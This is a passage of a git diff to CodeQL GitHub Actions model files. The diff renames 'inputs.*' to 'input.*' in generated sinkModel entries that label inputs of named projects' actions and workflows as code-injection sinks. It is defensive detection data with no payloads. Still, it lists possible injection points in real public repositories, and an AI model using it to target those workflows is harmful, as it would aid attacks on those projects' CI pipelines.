@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index a68a3372089..c0c663e69f3 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file + - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 6c874d64655..35c0d80a115 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file + - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 8d339364cf3..dc1dcff0b15 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index db6751f8ef5..2da63c894fc 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file + - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 68959bf2102..3dc87b3ed76 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f8aa8480088..94a140a9fe1 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 0f78fddcd96..d8f78274623 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file + - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 9eb860b13d9..f539135bba0 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 573b256121f..cc8a7f16492 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index c5278340c0b..ec1ed14fed5 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file + - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index b11973cfa00..18b37d3c658 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 1fd3ca1f005..c1699ec6816 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 727a21ac960..0fe9b73b6de 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index fff6557dd41..27a5defa298 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index e87c7cf5c06..05fd2667812 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 9c556053d66..5a91e3cd32f 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file + - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 6121c00ccfd..bb632423a1c 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file + - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 789bdb53aed..dca76acdc27 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] - - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file + - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 58389ad753e..c0e357715de 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 853948c5ec3..2bc23972e78 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] - - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file + - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 2e8a6683a57..740bfd26d69 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 55533f12312..f3bfa556ee5 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index a14d41a15b9..f8c4e3c68be 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 0888318ad93..793136cc3d3 100644 
--- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 6ea6dcdab70..e46601a7bff 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 2c18a166cc1..558ff908edf 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index f065947dbdc..a477e289d9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 438525e77e2..a72ace81445 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index ca3111ad03a..26c0794a19c 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 1e09e05e8b6..5ad39d5e184 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml 
